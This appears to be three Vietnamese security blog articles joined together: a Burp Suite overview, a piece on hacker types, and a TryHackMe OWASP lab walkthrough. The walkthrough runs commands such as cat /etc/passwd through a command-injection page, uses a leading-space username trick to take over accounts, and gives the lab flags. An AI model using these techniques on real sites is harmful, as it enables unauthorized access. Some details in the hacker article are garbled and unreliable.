Vì vậy, hôm nay Anonyviet sẽ mang đến cho các bạn một series về bảo mật hệ thông Website của bạn. Bạn sẽ được nhập vai vào một kẻ xấu và tự tấn công vào website của mình (Pentest) và từ đó sẽ tìm ra lỗi có trên hệ thống và cách khắc phục nó.

Tổng Quan Về Phần Mềm Hỗ Trợ Pentest Burpsuite

Yêu Cầu Cài Đặt :

• Burp Suite (link download ở đây : https://portswigger.net/burp/releases/community/latest)
• Tải bản Burp Suite Pro ở đây.
• Các bạn tiến hành cài đặt Burp Suite như một phần mềm bình thường, có thể lên Youtube để xem cách cài đặt nhé.
• Tạo tài khoản trên: https://portswigger.net/web-security

Giới Thiệu Về BurpSuite

Burpsuite hiện tại có rất nhiều phiên bản khác nhau. Mỗi phiên bản đều có tính năng và giao diện khá khác nhau. Ở bài viết này Anonyviet sẽ giới thiệu qua về bản Burpsuite 2021.4.3 này nhé.

Sau khi cài đặt, các bạn mở Burp Suite lên sẽ có giao diện giống bên dưới của mình.

Cách sử dụng Burp Suite

Ở giao diện Dashboard, sẽ có các thông tin về các Task đang chạy ở trên website cần pentest. EventLog ở phía dưới cho ta thấy các lỗ hổng đã được phát hiện. Các thông tin ở trong khung EventLog khá quan trọng, có nhiều lỗi liên quan đến certificate, lỗi kết nối cũng được hiển thị ở đây. Giúp bạn dễ dàng phát hiện ra và giải quyết nó nhanh hơn.

Kế đến đó chính là phần Target

Ở Target, sẽ có thông tin về các site con của website đó được quyền truy cập, các request có thể được thực hiện trên các site này, bạn có thể nhấn nút > ở trong mỗi site, để xem dưới dạng cây, sẽ có cái nhìn trực quan hơn về target.

Cũng ở trong Target, có thể phục vụ việc filter các request nhanh chóng hơn ở trong subtab Scope.

Tiếp đến là giao diện tab Proxy, đây là phần cực kỳ quan trọng trong Burp Suite. Tab HTTP history sẽ lưu lịch sử các request có được trong quá trình thao tác trong thời gian thực ngay trên ứng dụng hoặc Website. Bạn có thể xem trực tiếp các resquest, response và sửa nó.

Từ tab Proxy, bạn có thể chọn một request và gửi request này đến các công cụ khác trong mà Burp Suite hỗ trợ như  Repeater, Intruder, Comparer, …

Ở phiên bản mới nhất mà mình giới thiệu này, Burpsuite đã tích hợp thêm trình duyệt Chromium, rất thuận tiện và đỡ phải tự cấu hình nó trên các trình duyệt khác.

Để mở Chromium các bạn nhấn vào Open Browser giống hình bên dưới nhé.

Khi trình duyệt Chromium được khởi chạy, bạn vào một trang web bất kì, Anonyviet.Com chẳng hạn, và xem các request được ghi nhận ở trong tab HTTP Proxy. Nếu không thấy thì Intercept của bạn đang off. Click chuột để nó on lên nhé.

Tab kế tiếp đó là Intruder. Được sử dụng nhiều để BruteForce Username, Password, Directory hoặc là test IDOR…

Kế bên tab Intruder, đó chính là Repeater, là thành phần không thể thiếu cho mỗi lần chúng ta pentest. Tại đây, nó cho phép ta có thể chỉnh sửa bất kì thành phần nào của request, từ method, headers, parameters,… Sau khi chỉnh sửa request xong, bạn nhấn Send để gửi request đến server và nhận phản hồi.

Mình nói đây là thành phần không thể thiếu không phải là nói suông. Là bởi vì việc tấn công một target đòi hỏi chúng ta phải gửi những payload ở nhiều ví trí khác nhau. Bản chất của BurpSuite cũng vậy.

Việc tự thay đổi request như thế này, cho phép chúng ta thử toàn bộ các payload mà chúng ta có, tìm các input được reflect trong response (khi tìm lỗ hổng XSS), hoặc xem kết quả trả về khi chúng ta nhập payload là SQL injection,…, và để làm những tác vụ đó, Repeater là giải pháp tốt nhất để thực hiện.

Phần này khá quan trọng nên mình sẽ đi vào cụ thể ở các bài tiếp theo. Mọi người nhớ theo dõi nhé.

Tiếp đến là tab Sequencer, được dùng để phân tích độ phức tạp của các thuật toán tạo token trong website. Xem có dễ bị đoán hay không.

Tiếp đó là Tab Decoder dùng để encode hoặc decode các dạng ký tự như MD5, AES, BASE64…

Tab Comparer, dùng để so sánh các request, response khác nhau, do bạn gửi thông qua các tab như proxy tabs hoặc target tab. Bạn có thể gửi bằng cách nhấn chuột phải vào resquest và chọn send to comparer.

Tab Logger thì giống như cái tên của nó, sẽ lưu lại tất cả các resquest được thực thi trong Burp Suite.

Tab Extender là tab khá thú vị, nó cho phép bạn thêm mới các extension có sẵn của Burp, hoặc thêm những extension do chính bạn phát triển. Mình sẽ nói kỹ hơn ở các bài tiếp theo.

Trên đây là một số cơ bản mà bạn phải làm quen trước khi quá trình pentest bắt đầu. Các bạn có thể tự tìm hiểu thêm, sẽ rất có ích với beginner các bạn. Ở những bài tiếp theo chúng ta sẽ tìm hiểu về các kỹ thuật Bruteforce, thu thập thông tin,… Mong các bạn sẽ đón xem và ủng hộ nhé.

Tổng Hợp Series :

• Bài 1 : Giới thiệu tổng quan về BurpSuite

Chúc các bạn thành công
TMQ.

Câu hỏi thường gặp

Burp Suite là gì và tại sao tôi cần nó cho việc pentest website?

Burp Suite là một bộ công cụ bảo mật web toàn diện hỗ trợ quá trình pentest (kiểm thử thâm nhập). Nó giúp bạn tìm ra các lỗ hổng bảo mật trong website bằng cách cho phép bạn gửi các request tùy chỉnh, phân tích phản hồi từ server và tự động hóa nhiều tác vụ kiểm tra.

Tôi có cần phiên bản Pro của Burp Suite không?

Phiên bản Community của Burp Suite là miễn phí và cung cấp nhiều tính năng hữu ích cho người mới bắt đầu. Phiên bản Pro có thêm nhiều tính năng nâng cao hơn, nhưng phiên bản Community vẫn đủ tốt để bạn bắt đầu học và thực hành pentest.

Tôi có thể tìm hiểu thêm về các tính năng của Burp Suite ở đâu?

Bài viết này đã giới thiệu tổng quan về Burp Suite. Để tìm hiểu sâu hơn về từng tính năng cụ thể như Intruder, Repeater, hay các tab khác, hãy theo dõi các bài viết tiếp theo trong series của Anonyviet hoặc tham khảo tài liệu chính thức của Burp Suite.

Chính xác thì Hacker là gì?

Hacker là một từ đã được sử dụng lại và nghĩa gốc của nó gần như bị xóa bỏ hoàn toàn. Nó từng có nghĩa là một lập trình viên có năng khiếu, được định hướng. Hacker thực tế bị ám ảnh bởi lập trình, đến mức có thể tách biệt khỏi cuộc sống xã hội bình thường. Họ theo đuổi kiến ​​thức về cách hoạt động bên trong của máy tính, mạng và — trên hết — là phần mềm. Ngoài việc thiếu tương tác xã hội, hacker không được coi là một kẻ xấu.

Với sự phổ biến của CNTT, tội phạm mạng đã trở thành một vấn nạn. Những người có kỹ năng để gây ra các vụ tấn công mạng là hacker, và vì vậy thuật ngữ hacker đã trở nên có ý nghĩa như ngày nay. Nếu bạn yêu cầu ai đó giải thích hacker là gì thì họ sẽ mô tả một người có kiến ​​thức sâu rộng về máy tính, hệ điều hành và lập trình cũng như ý định truy cập vào các hệ thống máy tính.

Nhưng định nghĩa mới về hacker cũng chia hacker thành nhiều loại khác nhau. Có nột số người cố gắng xâm nhập hệ thống mạng là những người tốt và ngược lại. Vậy nên chúng ta có 2 loại hacker:

• Hacker mũ đen là những kẻ xấu thực sự. Họ là những kẻ xâm nhập mạng và thực hiện các hành động phạm tội. Họ cố gắng kiếm tiền thông qua các hoạt động bất hợp pháp.
• Hacker mũ trắng thì khác, họ có quyền xâm nhập mạng. Họ được thuê để kiểm tra tính bảo mật của công ty.

Tuy nhiên, trong cuộc sống, mọi thứ hiếm khi chỉ có hai màu đen và trắng.

• Hacker mũ xám hành xử giống như một tin tặc mũ trắng, nhưng họ không xin phép trước. Họ kiểm tra tính bảo mật của công ty và báo cáo cho doanh nghiệp với hy vọng được trả tiền thưởng. Họ vi phạm pháp luật — hack hệ thống mà không được phép là bất hợp pháp, ngay cả khi công ty biết ơn và trả tiên cho bạn.
• Hacker mũ xanh là người không có kỹ năng, nhưng họ biết cách sử dung các phần mềm tấn công yêu cầu kỹ năng thấp, chẳng hạn như chương trình tấn công DDOS. Họ sử dụng nó để chống lại một doanh nghiệp. Thường là để trả thù như một nhân viên cũ bất mãn có thể sử dụng các chiến thuật như vậy.
• Hacker mũ đỏ là cảnh sát duy nhất trong thế giới hacker. Họ là những tin tặc nhắm mục tiêu vào những tin tặc mũ đen. Giống như mũ xám, mũ đỏ đang sử dụng những phương pháp bất hợp pháp. Giống như Marvel’s Punisher, họ hoạt động bên ngoài luật pháp và không chịu trừng phát, thực hiện thứ công lý mà họ cho là đúng.
• Hacker mũ xanh là một người có tham vọng trở thành một hacker. Họ là những người muốn trở thành mũ đen.

Hacker tội phạm và Hacker chuyên nghiệp

Tin tặc chuyên nghiệp có thể là những tin tặc có đạo đức (White Hat) khi làm việc, sẵn sàng kiểm tra khả năng phòng thủ của bất kỳ công ty nào và thử độ bảo mật của họ. Họ có thể là những tin tặc làm việc cho các công ty bảo mật lớn hơn, thực hiện cùng một vai trò nhưng làm việc thường xuyên hơn.

Các tổ chức có thể trực tiếp sử dụng các tin tặc của riêng họ. Họ làm việc cùng với các đối tác của mình trong lĩnh vực hỗ trợ CNTT để liên tục thăm dò, kiểm tra và cải thiện an ninh mạng của tổ chức.

Đội đỏ cố gắng tấn công vào tổ chức của chính họ và đội xanh thì ngăn chặn cuộc tấn công đó. Thường thì bạn sẽ cố định ở một đội duy nhất. Nhưng các tổ chức khác thích khuấy động mọi thứ bằng cách di chuyển nhân viên giữa các đội để tấn công lẫn nhau.

Đôi khi các tác nhân đe dọa chuyển sang làm bảo mật chính thống. Những nhân vật trong ngành như Kevin Mitnick – từng là hacker được truy nã gắt gao nhất thế giới – điều hành các công ty tư vấn bảo mật của riêng họ.

Các hacker nổi tiếng khác đã được săn tuyển vào các công việc chính thống, chẳng hạn như Peiter Zatko, thành viên một thời của hack Cult of the Dead Cow. Vào tháng 11 năm 2020, ông gia nhập Twitter với tư cách là người đứng đầu bộ phận bảo mật sau các nhiệm kỳ tại Stripe, Google và Cơ quan Nghiên cứu và Dự án Quốc phòng Tiên tiến của Lầu Năm Góc.

Charlie Miller, được biết đến với việc vạch trần các lỗ hổng trong các sản phẩm của Apple và hack hệ thống lái và tăng tốc trên xe Jeep Cherokee, đã làm việc ở các vị trí bảo mật cấp cao tại NSA, Uber và Cruise Automation.

Nhưng cũng có rất nhiều trường hợp mọi người không thể kiếm được việc làm trong lĩnh vực an ninh mạng vì những sai lầm mà họ đã mắc phải trong quá khứ.

Một số tin tặc chuyên nghiệp làm việc cho — và được huấn luyện bởi — các cơ quan tình báo của chính phủ hoặc các đối tác quân sự. Các đội đặc nhiệm do chính phủ phê chuẩn được giao nhiệm vụ thực hiện các hoạt động thu thập thông tin tình báo, phòng thủ và tấn công mạng để đảm bảo an ninh quốc gia và chống khủng bố.

Hacker khi bị bắt

Tất cả các quốc gia có năng lực về mặt kỹ thuật đều có các đơn vị tình báo mạng. Họ thu thập, giải mã và phân tích các thông tin tình báo quân sự và phi quân sự về chiến lược, hoạt động và chiến thuật. Họ cung cấp phần mềm giám sát và tấn công thay mặt cho nhà nước tiến hành các nhiệm vụ gián điệp. Họ là những người trong bóng tối, nơi kẻ thù đang cố gắng làm điều tương tự với bạn. Họ muốn thâm nhập vào hệ thống của bạn giống như bạn muốn truy cập vào hệ thống của họ. Các đối tác của bạn đang phát triển các công cụ phần mềm phòng thủ và tấn công, đồng thời cố gắng phát hiện và tận dụng các cuộc tấn công zero-day, giống như bạn.

Shift5 là một công ty khởi nghiệp an ninh mạng được thành lập bởi hai cựu nhân viên Cơ quan An ninh Quốc gia. Họ không chỉ làm việc trong NSA mà còn làm việc trong đơn vị Tailored Access Operations. Đây là một trong những bộ phận bí mật nhất của NSA. Shift5 hứa hẹn cung cấp công nghệ giúp bảo vệ cơ sở hạ tầng quan trọng của Hoa Kỳ. Họ đã công bố một vòng tài trợ trị giá 20 triệu đô la vào tháng 10 năm 2021.

Lực lượng Phòng vệ Israel tương đương với NSA là Đơn vị 8200. Đơn vị 82 hay Đơn vị (Unit) là nhóm tình báo quân sự nổi tiếng của Israel. Các cựu sinh viên của Đơn vị 82, và nhóm bí mật bên trong được gọi là Đơn vị 81, đã thành lập hoặc đồng sáng lập một số công ty công nghệ thành công nhất. Check Point Software, Palo Alto Networks và CyberArk đều có các thành viên sáng lập cũ là Unit. Đây là những công ty thành công được dẫn dắt bởi những bộ não kỹ thuật thông minh nhất.

Các biến chứng nảy sinh khi các cựu nhân viên tình báo Hoa Kỳ được làm việc ở nước ngoài. Hai công dân Hoa Kỳ và một cựu công dân Hoa Kỳ đã gây chú ý gần đây khi có thông tin tiết lộ rằng họ đã làm việc cho nhóm DarkMatter, được thành lập tại Các Tiểu vương quốc Ả Rập Thống nhất. DarkMatter điều hành chương trình giám sát khét tiếng Project Raven cho chính phủ các Tiểu vương quốc.

Vào tháng 9 năm 2021, Marc Baier, Ryan Adams, Daniel Gericke đã tham gia vào một thỏa thuận truy tố hoãn lại hạn chế các hoạt động việc làm trong tương lai và yêu cầu thanh toán chung 1,68 triệu đô la tiền phạt.

Kỹ năng hấp dẫn trong thị trường còn hạn chế

Các công ty thuê những cựu tin tặc có kinh nghiệm để phục vụ công ty. Nhưng nếu bạn tham gia vào các hoạt động an ninh mạng cho một cơ quan nhà nước hoặc quân đội, bạn cần hiểu các giới hạn và kiểm soát được bản thân để đảm bảo bạn cung cấp dịch vụ của mình cho các tổ chức và cho các mục đích hợp pháp.

Nếu bạn lo lắng mình trở thành mục tiêu của hacker thì có thể sử dụng các biện pháp sau đây.

Câu hỏi thường gặp

Tại sao các công ty lại thuê hacker?

Các công ty thuê hacker mũ trắng (ethical hackers) để đánh giá và cải thiện khả năng bảo mật hệ thống của họ. Những chuyên gia này có kỹ năng thâm nhập hệ thống, giúp phát hiện lỗ hổng bảo mật trước khi tin tặc mũ đen có thể lợi dụng.

Có những loại hacker nào?

Có nhiều loại hacker, từ hacker mũ trắng (có đạo đức) làm việc để bảo vệ hệ thống, đến hacker mũ đen (phi đạo đức) thực hiện các hoạt động tấn công bất hợp pháp. Ngoài ra còn có hacker mũ xám (hoạt động ngoài phạm vi cho phép) và các loại khác với mục đích và phương thức hoạt động khác nhau.

Liệu việc thuê hacker có an toàn không?

Việc thuê các hacker mũ trắng từ các công ty bảo mật uy tín là an toàn. Họ được đào tạo bài bản và có kinh nghiệm trong việc kiểm tra bảo mật mà không gây hại cho hệ thống. Tuy nhiên, cần lựa chọn kỹ càng để tránh rủi ro.

Do thử thách này hơi nhiều nên mình sẽ chia làm 3 phần để bạn tiện theo dõi và cũng đọc cho đỡ chán hơn nhé.

Mình sẽ đi thẳng vào phần thực hành và bỏ qua các kiến thức kỹ thuật. Nếu bạn muốn tìm hiểu kiến thức hay cách hoạt động của lỗ hổng đó thì có thể vào phòng để đọc nha. Và lưu ý, những trang web mình truy cập trong bài viết này là máy chủ ảo của Tryhackme.

TryHackMe: Thử thách OWASP Top 10 Phần 1

Nhiệm vụ 5: [Mức độ nghiêm trọng 1]  Command Injection

 Active Command Injection là gì?

Tiêm lệnh mù (Blind command injection) xảy ra khi lệnh hệ thống được thực hiện cho máy chủ không trả lại phản hồi cho người dùng trong tài liệu HTML. Còn ACI (Active command injection) sẽ trả lại phản hồi cho người dùng. Nó có thể được hiển thị thông qua một số phần tử HTML.

Xem script sau: EvilCorp bắt đầu phát triển trên nền tảng web nhưng đã vô tình tiếp xúc với Internet. Nó chưa hoàn thành nhưng vẫn chứa lỗ hổng chèn lệnh. Nhưng lần này, phản hồi từ lệnh gọi hệ thống có thể được nhìn thấy trên trang web.

Đọc code mẫu từ evilhell.php và xem nó đang làm gì và lý do tại sao nó lại bị ACI. Mình sẽ để code mẫu ở dưới.

EvilShell (evilshell.php)

Phân tích chương trình:

1. Kiểm tra xem tham số “commandString” đã được khai báo chưa.
2. Nếu đúng như vậy, thì biến $command_string lấy những gì đã được chuyển vào trường đầu vào.
3. Sau đó, chương trình đi vào một khối lệnh try để thực thi hàm passthru($command_string). Bạn có thể đọc tài liệu về hàm passthru() trên trang web của PHP, nhưng nói chung, nó sẽ thực thi những gì được nhập vào trường đầu vào, sau đó chuyển đầu ra trực tiếp trở lại trình duyệt.
4. Nếu không thành công, nó sẽ báo lỗi. Nói chung, thì nó cũng không xuất ra cái gì đâu vì bạn không thể xuất ra stderr.

Các cách phát hiện Active Command Injection

ACI xảy ra khi bạn có thể thấy phản hồi từ lệnh gọi của hệ thống (system call). Trong đoạn code trên, hàm passthru() chuyển phản hồi trực tiếp đến tài liệu để bạn có thể thấy. Lệnh này sẽ giúp bạn dễ dàng xem và phân tích các lỗi của hệ thống.

Các lệnh có thể thử

Linux

• whoami
• id
• ifconfig/ip addr
• uname -a
• ps -ef

Windows

• whoami
• ver
• ipconfig
• tasklist
• nestat -an

Để trả lời những câu hỏi bên dưới thì bạn cần điều hướng đến http://10.10.147.50/evilshell.php.

# 1 Tập tin văn bản lạ nào nằm trong thư mục root của trang web?

Chúng ta có thể truy cập evilhell.php và thử lệnh whoami.

Thử tiếp lệnh uname -a.

Tiếp tục thử lệnh ls.

Các bạn thấy gì không? Mình tìm được file drpepper.txt.

#2 Có bao nhiêu người dùng không phải root/non-service/non-daemon?

Bạn có thể thử lệnh cat /etc/passwd

Không tìm được gì cả.

#3 Ứng dụng này đang chạy với tư cách người dùng nào?

Chúng tôi đã tìm thấy nó ở tầng trên, nhưng chúng ta hãy viết lại lệnh whoami.

Đáp án: www-data

#4 Shell của người dùng?

Chúng ta có thể tìm thấy nó bằng lệnh cat /etc/passwd.

Đáp án: usr/sbin/nologin

#5 Phiên bản Ubuntu đang chạy?

Như ảnh trên, các bạn chỉ cần nhập lệnh lsb_release -a để biết phiên bản Ubuntu ứng dụng đang chạy.

Đáp án: 18.04.4

#6 Xem MOTD

Chỉ cần tìm kiếm một chút trên internet là bạn sẽ biết lệnh hiển thị MOTD. MOTD (Message Of The Day) là đoạn tin nhắn khi bạn khởi động một ứng dụng trong terminal.

Đường dẫn của file MOTD là  /etc/update-motd.d. Mình đã làm thử, nhưng không có gì cả. Bí quá nên quyết định quay lại xem gợi ý :v.

cat /etc/update-motd.d/00-header

Thành công!

Đáp án: DR PEPPER

Nhiệm vụ 7: [Mức độ nghiêm trọng 2] Broken Authentication

Đối với lỗ hổng này, chúng ta sẽ nghiên cứu một lỗ hổng logic trong cơ chế xác thực.

Các nhà phát triển thường quên lọc đầu vào (tên người dùng và mật khẩu) do người dùng cung cấp trong ứng dụng của họ, điều này có thể khiến ứng dụng dễ bị tấn công SQL injection. Và chúng ta sẽ tập trung vào một lỗ hổng bảo mật xảy ra do lỗi của nhà phát triển nhưng rất dễ bị khai thác – đăng ký lại người dùng hiện có.

Ví dụ, giả sử có một người dùng hiện có với tên admin và bây giờ chúng ta muốn có quyền truy cập vào tài khoản đó, vì vậy những gì chúng ta có thể làm là cố gắng đăng ký lại tên người dùng đó nhưng có sửa đổi lại một chút. Chúng ta sẽ nhập “ admin” (lưu ý khoảng trống ở đầu). Bây giờ khi bạn nhập thông tin đó vào trường username và nhập các thông tin cần thiết khác như email hoặc mật khẩu và gửi dữ liệu đó. Nó sẽ đăng ký một người dùng mới nhưng người dùng đó sẽ có quyền giống như quản trị viên bình thường. Người dùng mới đó cũng sẽ có thể xem tất cả nội dung được trình bày dưới quyền quản trị viên người dùng.

Để xem demo, hãy truy cập trang web http://10.10.147.50:8888 và thử đăng ký username, bạn sẽ thấy người dùng đó đã tồn tại, vì vậy hãy thử đăng ký một người dùng “ darren” và bạn sẽ thấy rằng mình hiện đã đăng nhập và sẽ có thể xem nội dung chỉ có trong tài khoản của Darren, và đây là lúc chúng ta khai thác lỗ hổng này.

# 1 Flag mà bạn tìm thấy trong tài khoản của darren là gì?

Truy cập trang web http://10.10.147.50:8888.

 

 

Mình đang cố gắng đăng ký với tư cách là darren.

Áp dụng lý thuyết ở trên.

 

Mình để một khoảng trắng ở trước từ darren.

Mình đang đăng nhập với tư cách là thành viên. Thành công rồi nè!

Chúng ta đã tìm ra được flag.

Đáp án: fe86079416a21a3c99937fea8874b667

#2 Bây giờ hãy thử thực hiện thủ thuật tương tự và xem liệu bạn có thể đăng nhập bằng tài khoản arthur hay không.

# 3 Flag mà bạn tìm thấy trong tài khoản của arthur là gì?

Đáp án: d9ac0f7db4fda460ac3edeb75d75e16e

Hoàn thành 2 lỗi phổ biến trong OWASP 10 là Broken Authentication và Command Injection.

Phần tiếp theo vẫn sẽ là khai thác các lỗi khác trong OWASP 10 nữa nhé.

Câu hỏi thường gặp

OWASP Top 10 trên TryHackMe là gì?

Thử thách OWASP Top 10 trên TryHackMe là một môi trường học tập thực hành cho phép bạn khám phá và khai thác 10 lỗ hổng bảo mật web quan trọng nhất, dựa trên danh sách OWASP Top 10.

Tôi có cần kiến thức kỹ thuật sâu rộng để tham gia thử thách này không?

Không cần thiết. Bài viết hướng dẫn tập trung vào thực hành, bạn có thể tìm hiểu thêm kiến thức kỹ thuật trong phòng học TryHackMe nếu cần.

Tôi có thể tìm thấy câu trả lời cho các câu hỏi trong bài viết ở đâu?

Bạn cần truy cập vào địa chỉ http://10.10.147.50/evilshell.php và sử dụng các lệnh được đề cập trong bài viết để tìm ra câu trả lời.